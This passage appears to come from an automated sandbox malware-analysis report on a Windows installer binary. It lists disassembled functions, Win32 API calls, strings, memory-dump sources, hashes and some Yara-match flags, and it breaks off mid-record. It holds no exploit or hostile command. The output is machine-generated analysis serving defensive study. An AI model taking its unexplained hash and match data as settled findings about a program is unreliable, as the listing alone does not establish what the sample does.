                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1740715915-0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 008CD950: GetLastError.KERNEL32 ref: 008CDABF
                                                                                                                          • Part of subcall function 008CD950: GetFileAttributesW.KERNEL32(00000003,00000003,?,?,?,00000000), ref: 008CDB41
                                                                                                                          • Part of subcall function 008CD950: FindNextFileW.KERNEL32(?,?,?,?,00000000,00000000), ref: 008CDBB2
                                                                                                                          • Part of subcall function 008CD950: FindClose.KERNEL32(?), ref: 008CDBC6
                                                                                                                        • GetLastError.KERNEL32 ref: 008A01B2
                                                                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 008A02A0
                                                                                                                        • RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 008A02F7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesErrorFindLast$CloseDirectoryNextRemove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3974083381-0
                                                                                                                        • Opcode ID: 9d6f2521ac65a02a0243fd2f8ab5ad931537f1353afbf63400288f537918f5fe
                                                                                                                        • Instruction ID: e36f235b0534eb580807e3b0f098e761809dcd293949b95acec39bec727de5ee
                                                                                                                        • Opcode Fuzzy Hash: 9d6f2521ac65a02a0243fd2f8ab5ad931537f1353afbf63400288f537918f5fe
                                                                                                                        • Instruction Fuzzy Hash: 5951C971A007265BEF25AB64CC49BBE77B8FF42740F0401A9E51AE7581EB349E44CF91
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(--> Installer > MainWindow::OnCloseWindow,00943D4B,00000000,OnCloseWindow,00000217), ref: 0084A989
                                                                                                                        Strings
                                                                                                                        • --> Installer > MainWindow::OnCloseWindow, xrefs: 0084A968
                                                                                                                        • --> Installer > MainWindow::OnCloseWindow: WaitForInstallAsync timeout, xrefs: 0084A9BE
                                                                                                                        • OnCloseWindow, xrefs: 0084A953, 0084A9A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: --> Installer > MainWindow::OnCloseWindow$--> Installer > MainWindow::OnCloseWindow: WaitForInstallAsync timeout$OnCloseWindow
                                                                                                                        • API String ID: 1452528299-3845996101
                                                                                                                        • Opcode ID: 3b0b75e18a392b676a4f4439add517e8146dc3f61657d17c8511c9cce29834a0
                                                                                                                        • Instruction ID: b8c675fd7e7e3f7fac755549aaffcd329cf0c628f51db41c5e4f51f89eb68b89
                                                                                                                        • Opcode Fuzzy Hash: 3b0b75e18a392b676a4f4439add517e8146dc3f61657d17c8511c9cce29834a0
                                                                                                                        • Instruction Fuzzy Hash: 1431D2717483046BDA04AB749C56B6EB769FFC0B08F00881CF546D72D2CBA1A9009AA2
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 008C6F1F
                                                                                                                        • GetLastError.KERNEL32(Failed to initialize crypt context, error: ,00952ED6,00000001,Initialize,0000002B,?), ref: 008C6F57
                                                                                                                        Strings
                                                                                                                        • Failed to initialize crypt context, error: , xrefs: 008C6F4D
                                                                                                                        • Initialize, xrefs: 008C6F36
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast
                                                                                                                        • String ID: Failed to initialize crypt context, error: $Initialize
                                                                                                                        • API String ID: 1452528299-567339006
                                                                                                                        • Opcode ID: 9c1b8e2db9e71eeda3a763a281f923744fd1aae9b6001af13d78bd9270d10628
                                                                                                                        • Instruction ID: 3d294d67b012ecdaa58a6adf54e5a09962b798964c30b4d88284dd15f013031e
                                                                                                                        • Opcode Fuzzy Hash: 9c1b8e2db9e71eeda3a763a281f923744fd1aae9b6001af13d78bd9270d10628
                                                                                                                        • Instruction Fuzzy Hash: EF21F472A08341ABD710AB74EC42A6F77A4FFC5714F04493DF995C6292EB70E91887A3
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0092460E
                                                                                                                          • Part of subcall function 0092450A: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0091DE8B,?,00000000,-00000008), ref: 0092456B
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00924646
                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00924666
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 158306478-0
                                                                                                                        • Opcode ID: 46bf1f35e41335295e380a121980149eb98e7d95321e7931e98b5ee65896b779
                                                                                                                        • Instruction ID: 6f34e9804a5874515710ae982e21f5a2ce06b887458d1ccd38cb249ad9aad965
                                                                                                                        • Opcode Fuzzy Hash: 46bf1f35e41335295e380a121980149eb98e7d95321e7931e98b5ee65896b779
                                                                                                                        • Instruction Fuzzy Hash: B31126F15016397F67112B76BC8EDBF7A5DEE863947140424F602D1108EB74CD0056F5
                                                                                                                        APIs
                                                                                                                        • OpenProcess.KERNEL32(00100451,00000000,?,008B8551,?,?), ref: 0089C6D4
                                                                                                                        • GetLastError.KERNEL32 ref: 0089C6E2
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0089C6F7
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0089C701
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastProcess$CurrentOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4145867261-0
                                                                                                                        • Opcode ID: bac0be39769ac007d57a918f083a99c6fca6511ca8a8092adc072717cf3945d5
                                                                                                                        • Instruction ID: 1d3de1962a73ad8ddbf1b87db80ee369a12b379570b2960067e055848cb966f7
                                                                                                                        • Opcode Fuzzy Hash: bac0be39769ac007d57a918f083a99c6fca6511ca8a8092adc072717cf3945d5
                                                                                                                        • Instruction Fuzzy Hash: 65F0E271204304AFDB002FBD9C8861A7B98EB48366B080528FA48C7291D7719C019B60
                                                                                                                        APIs
                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00926884,00000000,00000001,?,?,?,00917B59,?,00000000,00000000), ref: 0092C0B1
                                                                                                                        • GetLastError.KERNEL32(?,00926884,00000000,00000001,?,?,?,00917B59,?,00000000,00000000,?,?,?,0091749F,?), ref: 0092C0BD
                                                                                                                          • Part of subcall function 0092C110: CloseHandle.KERNEL32(FFFFFFFE,0092C0CD,?,00926884,00000000,00000001,?,?,?,00917B59,?,00000000,00000000,?,?), ref: 0092C120
                                                                                                                        • ___initconout.LIBCMT ref: 0092C0CD
                                                                                                                          • Part of subcall function 0092C0EF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0092C08B,00926871,?,?,00917B59,?,00000000,00000000,?), ref: 0092C102
                                                                                                                        • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00926884,00000000,00000001,?,?,?,00917B59,?,00000000,00000000,?), ref: 0092C0E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2744216297-0
                                                                                                                        • Opcode ID: 8cc0f4154e9d1b258cffd903b7a11ed5ca0349259107db54dff66bd1d9461c3e
                                                                                                                        • Instruction ID: 5b06a68eefb8dcce5135ec28c198f107dde6b2efd2af000b8841d2945432f9f0
                                                                                                                        • Opcode Fuzzy Hash: 8cc0f4154e9d1b258cffd903b7a11ed5ca0349259107db54dff66bd1d9461c3e
                                                                                                                        • Instruction Fuzzy Hash: E0F03076498224FBCF222FD2FC09E9E3F66FB493A1F008411FE0995131C7328821AB91
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 0595698E
                                                                                                                          • Part of subcall function 0594CD2C: __EH_prolog3.LIBCMT ref: 0594CD33
                                                                                                                          • Part of subcall function 0594CF92: __EH_prolog3.LIBCMT ref: 0594CF99
                                                                                                                          • Part of subcall function 0594C9C3: __EH_prolog3_GS.LIBCMT ref: 0594C9CA
                                                                                                                          • Part of subcall function 0595670B: __EH_prolog3_GS.LIBCMT ref: 05956715
                                                                                                                          • Part of subcall function 05958264: __EH_prolog3_GS.LIBCMT ref: 0595826B
                                                                                                                          • Part of subcall function 0595612E: __EH_prolog3_GS.LIBCMT ref: 05956138
                                                                                                                          • Part of subcall function 05952D29: __EH_prolog3.LIBCMT ref: 05952D30
                                                                                                                          • Part of subcall function 0595663A: __EH_prolog3_GS.LIBCMT ref: 05956641
                                                                                                                          • Part of subcall function 05958211: __EH_prolog3.LIBCMT ref: 05958218
                                                                                                                          • Part of subcall function 0595690F: __EH_prolog3_GS.LIBCMT ref: 05956916
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_$H_prolog3
                                                                                                                        • String ID: <D$!
                                                                                                                        • API String ID: 3952504126-4236082241
                                                                                                                        • Opcode ID: cf2aab86786eca2c6e23c1d6a6b22fc6f06a7575f9f2b41736000418809f6622
                                                                                                                        • Instruction ID: 549238dc25bb612a2595e212118a91844da223ecb284d29237b9517a2fb35548
                                                                                                                        • Opcode Fuzzy Hash: cf2aab86786eca2c6e23c1d6a6b22fc6f06a7575f9f2b41736000418809f6622
                                                                                                                        • Instruction Fuzzy Hash: 67024930E05288EEDF14EBA4D959BEDBBB4AF95300F5040A9D40167281EB746F48DFA6
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldiv
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 3732870572-2137968064
                                                                                                                        • Opcode ID: 9e0c9a6670e52ce7c6c41f1c23168dbaa328be9cd92c1b1dc58e6873131f9eba
                                                                                                                        • Instruction ID: dca5fd9837665d3fd29a24a548f008cacc266bcf28d3b86dc9356a9b33de15ba
                                                                                                                        • Opcode Fuzzy Hash: 9e0c9a6670e52ce7c6c41f1c23168dbaa328be9cd92c1b1dc58e6873131f9eba
                                                                                                                        • Instruction Fuzzy Hash: 94A1CB31E00259AFDF64CE7888507BE7BA9EF46320F188D5AECB5AB3C1D23499418B50
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3_
                                                                                                                        • String ID: $'
                                                                                                                        • API String ID: 2427045233-2481900351
                                                                                                                        • Opcode ID: 057dc388854ea838bdbfc3a23c8c95e591b3caf2bfc5d976299ee58a5d7be9a7
                                                                                                                        • Instruction ID: 398543b805bb1d8b12723415d77098c7d8021e592793e0f4a5c1ffd91d8d6f11
                                                                                                                        • Opcode Fuzzy Hash: 057dc388854ea838bdbfc3a23c8c95e591b3caf2bfc5d976299ee58a5d7be9a7
                                                                                                                        • Instruction Fuzzy Hash: 63914330D09288DFDB01EBA4C958BEDBBB4AF55310F14809DC495A7281EB786F09CF62
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0595B54B
                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0595B7ED
                                                                                                                          • Part of subcall function 0595BA37: __EH_prolog3_GS.LIBCMT ref: 0595BA3E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1724191152.0000000005940000.00000040.00001000.00020000.00000000.sdmp, Offset: 05940000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_5940000_0x001900000002ab40-59.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Concurrency::cancel_current_taskH_prolog3_H_prolog3_catch
                                                                                                                        • String ID: VJD
                                                                                                                        • API String ID: 2709520005-3965167894
                                                                                                                        • Opcode ID: 37d102c94880c8b40f7f8822df0ca950d373e151f53097bbf910094cd7df9499
                                                                                                                        • Instruction ID: de2019b89e812b17ab69270a4ce8e949a1a1bab6f915b465029cfd59eefb692b
                                                                                                                        • Opcode Fuzzy Hash: 37d102c94880c8b40f7f8822df0ca950d373e151f53097bbf910094cd7df9499
                                                                                                                        • Instruction Fuzzy Hash: 74619772F052199FCF14EFA8D9949BDB7F6AF88320F24411AE816F7290DB706D118B94
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 008E6174
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,?,?), ref: 008E628A
                                                                                                                          • Part of subcall function 008E6680: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,00000000), ref: 008E669A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Acquire$Release
                                                                                                                        • String ID: first
                                                                                                                        • API String ID: 1678258262-2456940119
                                                                                                                        • Opcode ID: f2c3a20b977fa0b293933e34a493d47794395058963f76c5bb319bec2be065fe
                                                                                                                        • Instruction ID: b2371ad657d707739d5104e9cb811b67a996e0ccddde71555f9473ba9b53dd36
                                                                                                                        • Opcode Fuzzy Hash: f2c3a20b977fa0b293933e34a493d47794395058963f76c5bb319bec2be065fe
                                                                                                                        • Instruction Fuzzy Hash: A551E1706043418FC714CF29C880A6AB7E1FFD93A4F14892DF999DB295D730E846CB91
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 0089CD73
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                        • String ID: LaunchElevatedProcess$launch_win.cc
                                                                                                                        • API String ID: 24740636-3547372863
                                                                                                                        • Opcode ID: 23f795304cfee970a4de19227c18d75bd612686717f261cc703a93055badc9e0
                                                                                                                        • Instruction ID: 209430cf16f277a2747bc9c4a636456245d4d3236cce550f46efb641a68083a1
                                                                                                                        • Opcode Fuzzy Hash: 23f795304cfee970a4de19227c18d75bd612686717f261cc703a93055badc9e0
                                                                                                                        • Instruction Fuzzy Hash: 6C517FB19083809FDB209F24C841BAABBE4FFC5314F048A1DF8C997252EBB19548DB53
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        • source, xrefs: 008480B6, 008480FE, 00848105, 00848116
                                                                                                                        • ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 008481AD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _strlen
                                                                                                                        • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:245: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$source
                                                                                                                        • API String ID: 4218353326-1467476835
                                                                                                                        • Opcode ID: bc666f337a8978639b28b166b1181ac8d66138a074929ce1f3fd79f37f1d6c04
                                                                                                                        • Instruction ID: c9b66e0a72139c58a60c99e27bf8af9bfc96b19f89518426952b67eba37ddb0f
                                                                                                                        • Opcode Fuzzy Hash: bc666f337a8978639b28b166b1181ac8d66138a074929ce1f3fd79f37f1d6c04
                                                                                                                        • Instruction Fuzzy Hash: CD41E671E0025DABDF14ABA4DC82AEE7775FF95354F04013AF905B7282DB702949C7A2
                                                                                                                        APIs
                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 008E6548
                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(?), ref: 008E6622
                                                                                                                          • Part of subcall function 008E6680: TryAcquireSRWLockExclusive.KERNEL32(00972AD0,00000000,00000000,00000000,00000000), ref: 008E669A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000001.00000002.1723135992.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                                                        • Associated: 00000001.00000002.1723112428.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723224963.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723256545.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723283258.0000000000961000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723315571.0000000000971000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000001.00000002.1723358687.0000000000977000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_1_2_820000_0x001900000002ab40-59.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExclusiveLock$Acquire$Release
                                                                                                                        • String ID: first
                                                                                                                        • API String ID: 1678258262-2456940119
                                                                                                                        • Opcode ID: dc06a6577daf7b86baad5382f75abf1fcf83ffec955f7eb23646f4871e8ddf11
                                                                                                                        • Instruction ID: 4e6907865c704d8b913b973ba9fc6dc172efb8e23bd04ec93a3a8d246cad9c0a
                                                                                                                        • Opcode Fuzzy Hash: dc06a6577daf7b86baad5382f75abf1fcf83ffec955f7eb23646f4871e8ddf11
                                                                                                                        • Instruction Fuzzy Hash: 7A316171A103418FC7148F2BC841766B7A2FFE6794F18C67CF858DB269E77198628781
                                                                                                                        APIs
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000,?,?,?,-00000001,?,008F00C5,008CE3DD,?,-00000001,?,008CE3DD,CR_SOURCE_ROOT,0000000E), ref: 008F0303
                                                                                                                        • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,-00000001), ref: 008F0362
                                                                                                                        Strings
                                                                                                                        • ..\..\third_party\libc++\src\include\string_view:267: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 008F03D8
                                                                                                                        Memory Dump Source
